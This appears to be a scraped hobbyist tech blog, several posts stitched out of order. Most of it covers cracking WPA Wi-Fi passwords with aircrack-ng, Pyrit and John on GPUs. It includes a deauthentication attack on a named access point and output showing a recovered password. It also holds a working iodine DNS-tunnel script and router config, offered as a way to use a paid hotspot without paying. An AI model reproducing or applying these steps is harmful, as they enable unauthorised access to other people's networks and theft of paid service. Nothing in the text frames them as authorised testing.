CUDA Driver:
rm -r /usr/local/cuda rm -r /Library/Frameworks/CUDA.framework |
CUDA Toolkit:
rm -r /Developer/NVIDIA |
Surrender your ego
CUDA Driver:
rm -r /usr/local/cuda rm -r /Library/Frameworks/CUDA.framework |
CUDA Toolkit:
rm -r /Developer/NVIDIA |
Cracking the WPA password with aircrack is not fast, especially in a VM. So the first thing is to do the cracking outside of BackTrack. We have to get the .cap file out of the VM. Just drag it from the VM to the desktop.
Also using just the CPU is slow. GPUs these days can crack faster than the CPU.
OS X Mountain Lion comes with OpenCL tools. X Code is big and most of it is iOS and OS X dev tools which we don't need. So only Command Line Tools can be installed. You have to have an Apple developer account to download it (it's free):
Then:
Click Next or Continue or whatever until it is done.
Full X Code can be installed from the App Store:
Then Command Line Tools have to be installed. Go to XCode, then Properties:
Pyrit is a python tool that cracks WPA passwords.
Prerequisites. Download these in a folder named PYRIT for example:
http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz
Then in the folder in terminal do:
tar -xzf libdnet-1.12.tgz cd libdnet-1.12 ./configure make sudo make install cd python sudo python setup.py install cd ../.. tar -xzf pylibpcap-0.6.4.tar.gz cd pylibpcap-0.6.4 sudo python setup.py install cd .. tar -xzf scapy-latest.tar.gz cd scapy-2.1.0 sudo python setup.py install cd .. |
Now, it's time for the pyrit tool:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only cd pyrit-read-only cd pyrit sudo python setup.py install |
Extra steps for NVidia:
Download nvidia driver from http://developer.nvidia.com/cuda/cuda-downloads.
If you don't have nvidia driver, you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.
Check the first and second option:
Then:
cd .. cd .. cd pyrit-read-only cd cpyrit_cuda sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install |
On a macbook with ATI we get something like:
$ pyrit list_cores Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'OpenCL-Device 'ATI Radeon HD 6750M'' #2: 'CPU-Core (SSE2/AES)' #3: 'CPU-Core (SSE2/AES)' #4: 'CPU-Core (SSE2/AES)' #5: 'CPU-Core (SSE2/AES)' #6: 'CPU-Core (SSE2/AES)' #7: 'CPU-Core (SSE2/AES)' #8: 'CPU-Core (SSE2/AES)' |
On a macbook with nVidia, we get something like:
$ pyrit list_cores Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'CUDA-Device #1 'GeForce 9400M'' #2: 'CPU-Core (SSE2)' |
Note: I have no idea why when OpenCL or CUDA is installed it takes the place of one of the cores, on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.
$ pyrit benchmark Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Running benchmark (7724.0 PMKs/s)... - Computed 7723.98 PMKs/s total. #1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7) #2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8) #3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9) #4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0) #5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9) #6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8) #7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8) #8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9) |
You can see that the GPU is faster than 7 cores (they should be 8, i don't know why one is missing)
Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html
Make sure you're in Discrete Only mode.
Otherwise pyrit will complain:
Exception in thread OpenCL-Device 'ATI Radeon HD 6750M': [...] SystemError: Failed to create command-queue (CL_INVALID_VALUE) [...] SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly |
$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)... Parsed 3539 packets (3539 802.11-packets), got 115 AP(s) Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically. Attacking 20 handshake(s). Tried 140007 PMKs so far; 7550 PMKs per second. The password is 'forzajuve'. |
--all-handshakes means that all handshakes in the file will be used together.
It will utilize the CPU and the GPU simultaneously. And now we get around 10k attempts/sec which is a lot better than aircrack-ng in a vm.
Note: your computer will unresponsive, make sure anything CPU or GPU intensive is switched off.
Some stuff was taken from here.
Check the wifis category for more tutorials.
(Go to part1)
Let's check the wi-fis:
# airodump-ng mon0 |
Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says on which channel should we stay and -w says the file we use to dump the authentication.
# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap |
This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c - the client we deauth, -0 is the attack, 1 means to perform it once only.
# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5 |
And we get the handshake.
Now we crack it. We will use a wordlist.
# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt |
if the password is in the wordlist, then
Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.
First, trying to crack wi-fi APs on OS X natively will not work great. KisMAC is not great, it cannot inject packets with the macbook's default wi-fi card. aircrack-ng does not work.
So to inject stuff, an external USB wi-fi is required. I have tried ALFA AWUS036NEH (chipset Ralink RT3070) and TP-Link TL-WN722N (chipset Atheros AR9271).
ALFA's are recommended by half the internet, but I think they suck. My Alfa is not stable, it doesn't work with BT5R3, only BT5R2. The Atheros is a lot better, but no 5Ghz. I'm waiting for NETGEAR WNDA3200 which has 5Ghz radio that works simultaneously with the 2.4Ghz radio.
The best VM to use is BackTrack - all the cracking tools are inside. Latest version is BT5R3. It even comes as a prebuilt VMware virtual machine. I'm using VMware Fusion on OS X.
(user: root, pass: toor; startx to launch gnome):
Adding the card to the USB:
Then in terminal we check for a wi-fi card. We find one on wlan1 and start a monitoring interface for it.
# airmon-ng # airmon-ng start wlan1 # airmon-ng |
Then, let's check the wi-fis:
# airodump-ng mon0 |
In later articles we'll see how to hack the wi-fi.
root# ./john --test -format=wpapsk-opencl OpenCL platform 0: Apple, 2 device(s). Using device 1: <strong>ATI Radeon HD 6750M</strong> Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE Raw: 12126 c/s real, 87771 c/s virtual root# ./john --test -format=wpapsk-opencl --device=0 OpenCL platform 0: Apple, 2 device(s). Using device 0: <strong>Intel(R) Core(TM) i7-2820QM CPU @ 2.30GHz</strong> Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE Raw: 1192 c/s real, 156 c/s virtual |
Sometimes there are a lot of VMware Fusion items left over in the "Open with" dialog.
Here's how to rebuild the "Open with" database:
dude$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user dude$ killall Finder |
Plugin the USB, then:
Then
mf$ hdiutil convert -format UDRW -o BT5R2-GNOME-64.img BT5R2-GNOME-64.iso mf$ diskutil list /dev/disk2 #(careful here) mf$ dd if=./BT5R2-GNOME-64.img.dmg of=/dev/rdisk2 bs=1m |
Note: that bs=1m (without it the speed is going to be less than 1mb/sec, with it it's 10mb/sec)
Note2: we're using rdisk2 instead of disk2, again this way it's faster.
It's pretty good. I just found it so no feedback of any kind, but it looks good. App is available in the App Store.
How to get internet connectivity on an open wi-fi access point that requires a credit card without actually paying:
[dropdown_box expand_text="code" show_more="Show" show_less="Hide" start="hide"]
#!/bin/sh /etc/rc.common # Copyright (C) 2006-2011 OpenWrt.org START=50 start_instance () { local section="$1" config_get address "$section" 'address' config_get password "$section" 'password' config_get tunnelip "$section" 'tunnelip' config_get tld "$section" 'tld' service_start /usr/sbin/iodined -l "$address" -c -s -P "$password" $tunnelip "$tld" & sleep 1 ifconfig dns0 $tunnelip netmask 255.255.255.0 } start() { config_load 'iodined' config_foreach start_instance 'iodined' } stop() { service_stop /usr/sbin/iodined }
[/dropdown_box]
/etc/init.d/iodined enable
config iodined option address '' option password '' option tunnelip '192.168.14.1' option tld ''
[dropdown_box expand_text="code" show_more="Show" show_less="Hide" start="hide"]
#!/bin/bash # are we root? if ! [ $UID == 0 ] ; then echo "IODINE SETUP: use 'sudo $0'"; exit 0; fi; #$1 says whether we use clearcode or stoynov.com if [ -z $1 ] ; then echo 'IODINE SETUP: first param must be 1(i.clearcode.org) or 2(i.stoynov.com)'; exit 0; fi; if [ $1 == 1 ] ; then endpoint_domain='i.clearcode.org' endpoint_net='192.168.14.0/24' endpoint_gw='192.168.14.1' fi; if [ $1 == 2 ] ; then endpoint_domain='j.stoynov.com' endpoint_net='192.168.15.0/24' endpoint_gw='192.168.15.1' fi; # get the first dns from resolv.conf and use it. abused_nameserver=`cat /etc/resolv.conf | grep nameserver | head -1 | awk '{print $2}'` abused_nameserver=8.8.4.4 echo ">>>>>>>>>>>>>>>>>>>USING DNS: $abused_nameserver" # kill iodine if any and remove old routes killall iodine route delete 8.8.8.8 > /dev/null route delete 8.8.4.4 > /dev/null # get the default gateway for iodine default_gateway=`netstat -rn | grep default | awk '{print $2}'` #when I die, restore the default gateway, use trap to get Ctrl+C function disconnect() { # kill the process with id coming as a parameter kill -9 $1; route add default $default_gateway; } #disconnect and exit function cleanup() { disconnect $(pgrep iodine); exit 0; } trap "cleanup" SIGINT #dns query types dns_query_types="TXT CNAME NULL" function connect() { # start iodine (possible dns types are CNAME, TXT, NULL), -F puts a pid file with the processId inside iodine_output=$(./iodine -T CNAME -r -P "peshev sucks" -F /var/run/iodine.pid $abused_nameserver $endpoint_domain 2>&1 | tee /dev/tty) #remote_net from iodine_output remote_net=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $3}') #remote_net is something like 192.168.15.2/27 and should be 192.168.15.0/27 remote_net=$(./ipcalc -nb $remote_net | grep Network | awk '{ print $2}') #tunX_ip (tunX_ip) from iodine_output tunX_ip=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $5}') #remote_gateway (gateway on iodine) from iodine_output remote_gateway=$(echo $iodine_output | grep -o "Server tunnel IP is [0-9\.]*" | awk '{print $5}') # route to nameserver to be abused route add -host $abused_nameserver $default_gateway # route to remote network via tunX_ip (necessary because my mac sucks) route add -net $remote_net $tunX_ip # change default gateway from system default to iodine route delete default route add default $remote_gateway # time to download 100kb file in seconds (1.34). We remove the dot for easy comparison (1.34 -> 134) echo TESTING SPEED; t=$( { time -p curl -s ftp://speedtest:speedtest@ftp.otenet.gr/test100k.db; } 2>&1 ) seconds=$(echo $t | awk '{ print $2;}' | tr -d . ); echo SECONDS: $seconds; } connect; echo 'READY...READY...READY...READY...READY...' while true; do sleep 10000; done;
[/dropdown_box]
Some testing found out speeds like 7-15 kb/s, sometimes less on 8.8.8.8 and 8.8.4.4. With local DNS servers the speeds are like 100kb/s. More testing is necessary.
With OS X 10.8 gfxCardStatus is no longer capable of enforcing Integrated Graphics card only.
When one uses VMWare Fusion, the discrete graphics card is enforced, which drains the battery too fast.
I have not found any solution online to fix this. But I managed (thanks to PePe) to discover one.
How to use Integrated Graphics Card with VMware Fusion on OS X 10.8:
remove the "Split to 2gb files"
defrag and gather files together physically on the disk with some good defragger (xp's internal sucks big time).